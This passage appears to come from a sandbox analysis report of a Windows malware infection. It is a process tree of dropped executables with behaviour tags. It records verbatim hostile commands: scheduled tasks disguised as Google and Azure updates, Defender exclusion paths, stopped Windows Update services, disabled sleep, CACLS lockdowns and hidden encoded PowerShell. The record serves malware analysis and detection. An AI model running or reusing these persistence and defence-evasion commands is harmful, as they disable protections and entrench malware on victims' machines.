        "C:\Users\Admin\AppData\Local\a6b6cd67-e916-4067-8f32-24f7cce819a6\build3.exe"
        6⤵
        
        PID:4092
        
        C:\Users\Admin\AppData\Local\a6b6cd67-e916-4067-8f32-24f7cce819a6\build3.exe
        
        "C:\Users\Admin\AppData\Local\a6b6cd67-e916-4067-8f32-24f7cce819a6\build3.exe"
        7⤵
        
        PID:5988
        
        C:\Windows\SysWOW64\schtasks.exe
        
        /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
        8⤵
        Blocklisted process makes network request
        Creates scheduled task(s)
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:4940
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\iacrcjwhmdyc.xml"
  2⤵
  - Creates scheduled task(s)
  PID:8
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:8856
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:5520
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:6104
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:7888
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:1232
- C:\Users\Admin\AppData\Local\Temp\1763.exe
  C:\Users\Admin\AppData\Local\Temp\1763.exe
  2⤵
  PID:2068
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:9400
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  PID:7696
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  PID:7724
- C:\Users\Admin\AppData\Local\Temp\1929.exe
  C:\Users\Admin\AppData\Local\Temp\1929.exe
  2⤵
  PID:7296
- C:\Users\Admin\AppData\Local\Temp\3686.exe
  C:\Users\Admin\AppData\Local\Temp\3686.exe
  2⤵
  PID:5864
- - C:\Program Files (x86)\AGP Service\agpsvc.exe
    "C:\Program Files (x86)\AGP Service\agpsvc.exe"
    3⤵
    PID:8308
- C:\Windows\system32\regsvr32.exe
  regsvr32 /s C:\Users\Admin\AppData\Local\Temp\4099.dll
  2⤵
  PID:1552
- - C:\Windows\SysWOW64\regsvr32.exe
    /s C:\Users\Admin\AppData\Local\Temp\4099.dll
    3⤵
    PID:5200
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:8432
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:6676
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:3492
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:440
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:6952
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:5396
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:5500
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /create /f /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\xhoymdsniflw.xml"
  2⤵
  - Creates scheduled task(s)
  PID:6304
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:5916
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /create /f /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\yjkibfzfvbok.xml"
  2⤵
  - Creates scheduled task(s)
  PID:7068
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:1856
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:4544
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:1160
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:8152
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:8544
- C:\Users\Admin\AppData\Local\Temp\1AFC.exe
  C:\Users\Admin\AppData\Local\Temp\1AFC.exe
  2⤵
  PID:7904
- - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
    "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
    3⤵
    PID:7356
  - - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
      "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
      4⤵
      PID:8600
- - C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe
    "C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe"
    3⤵
    PID:5268
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:7492
  - - C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe
      "C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe"
      4⤵
      PID:9816
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:9236
- - C:\Users\Admin\AppData\Local\Temp\kos2.exe
    "C:\Users\Admin\AppData\Local\Temp\kos2.exe"
    3⤵
    PID:5668
- - C:\Users\Admin\AppData\Local\Temp\latestX.exe
    "C:\Users\Admin\AppData\Local\Temp\latestX.exe"
    3⤵
    PID:8084
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:9004
- C:\Users\Admin\AppData\Local\Temp\2B1A.exe
  C:\Users\Admin\AppData\Local\Temp\2B1A.exe
  2⤵
  PID:5628
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  PID:7452
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  - Executes dropped EXE
  PID:4680
- C:\Users\Admin\AppData\Local\Temp\420E.exe
  C:\Users\Admin\AppData\Local\Temp\420E.exe
  2⤵
  PID:8268
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -nologo -noprofile
    3⤵
    PID:2668
- - C:\Users\Admin\AppData\Local\Temp\420E.exe
    "C:\Users\Admin\AppData\Local\Temp\420E.exe"
    3⤵
    PID:5852
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:10624
- C:\Windows\SysWOW64\explorer.exe
  C:\Windows\SysWOW64\explorer.exe
  2⤵
  PID:8724
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  PID:7576
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\hfquevqyxqbr.xml"
  2⤵
  - Creates scheduled task(s)
  PID:680
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  - Executes dropped EXE
  PID:2244
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:4836
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:8348
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:6756
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:8904
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:8840
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:1516
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:8904
- C:\Windows\SysWOW64\cmstp.exe
  "C:\Windows\SysWOW64\cmstp.exe"
  2⤵
  PID:7856
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:5940
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:9344
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:10112
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:10232
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:6500
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:8280
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /create /f /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\yjkibfzfvbok.xml"
  2⤵
  - Creates scheduled task(s)
  PID:9364
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:9944
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:10112
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:7860
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:8340
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:6456
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:9232
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  PID:8776
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:9372
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:9640
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:9952
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:3984
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:8584
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\SysWOW64\cmd.exe"
  2⤵
  PID:1348
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:8640
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:712
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:1700
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:1036
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:10776
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:11008
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:3252
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:10584
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:10960
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:9420
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:10824
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:11044
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:204
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:10696
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:10972
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:10944
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:10932
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:10324
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:6344
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:10724
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:10844
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\iacrcjwhmdyc.xml"
  2⤵
  - Creates scheduled task(s)
  PID:6592
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:10488
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:10656
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /create /f /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\yjkibfzfvbok.xml"
  2⤵
  - Creates scheduled task(s)
  PID:10964
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:5140
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:4952
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:10760
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:8396
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:9720
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:9396
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\hfquevqyxqbr.xml"
  2⤵
  - Creates scheduled task(s)
  PID:10992
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:11128
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:10688
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:9420
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:11220
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:6148
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:10336
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:3472
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:8792
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:9500
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:10204
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:8576
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:3460
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\iacrcjwhmdyc.xml"
  2⤵
  - Creates scheduled task(s)
  PID:3568
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:6148
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:11372

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Ez4Zp00.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Ez4Zp00.exe
1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:208
- C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bp5ag06.exe
  C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bp5ag06.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:4376
- - C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Gj52Hd6.exe
    C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Gj52Hd6.exe
    3⤵
    PID:2556
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      4⤵
      Modifies Windows Defender Real-time Protection settings
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3380
- - C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2UB5109.exe
    C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2UB5109.exe
    3⤵
    - Executes dropped EXE
    PID:4948
- C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3xz56pU.exe
  C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3xz56pU.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:3464
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:2604

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\LO0Gz18.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\LO0Gz18.exe
1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2824
- C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4Kf202vY.exe
  C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4Kf202vY.exe
  2⤵
  - Executes dropped EXE
  PID:5392
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:6944
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:7004

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\pd8Ty33.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\pd8Ty33.exe
1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2232
- C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5yK2fM6.exe
  C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5yK2fM6.exe
  2⤵
  PID:5744
- - C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
    "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"
    3⤵
    PID:5692
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
      4⤵
      PID:3524
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:8016
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "explothe.exe" /P "Admin:N"
        5⤵
        
        PID:7592
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "explothe.exe" /P "Admin:R" /E
        5⤵
        
        PID:9068
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:4296
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\fefffe8cea" /P "Admin:N"
        5⤵
        
        PID:6536
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\fefffe8cea" /P "Admin:R" /E
        5⤵
        
        PID:5452
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Creates scheduled task(s)
      PID:5108
  - - C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
      4⤵
      PID:4788

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 helpmsg 20
1⤵
PID:4924

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 0
1⤵
PID:2584

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\3630e32b501b4835b5cbbe6d5ea0998b /t 5828 /p 5824
1⤵
PID:3508

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\callcustomer.exe
C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\callcustomer.exe
1⤵
PID:7180

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\callcustomerpro.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\callcustomerpro.exe
1⤵
PID:4860

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
PID:216

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:7816

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:8528

C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
1⤵
PID:9068

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
PID:8252

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4816

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5184

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6644

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:8980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:5580

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:1460

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:8040

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:9044

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
PID:6816

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
1⤵
PID:8844

C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\CyZXKNy.exe
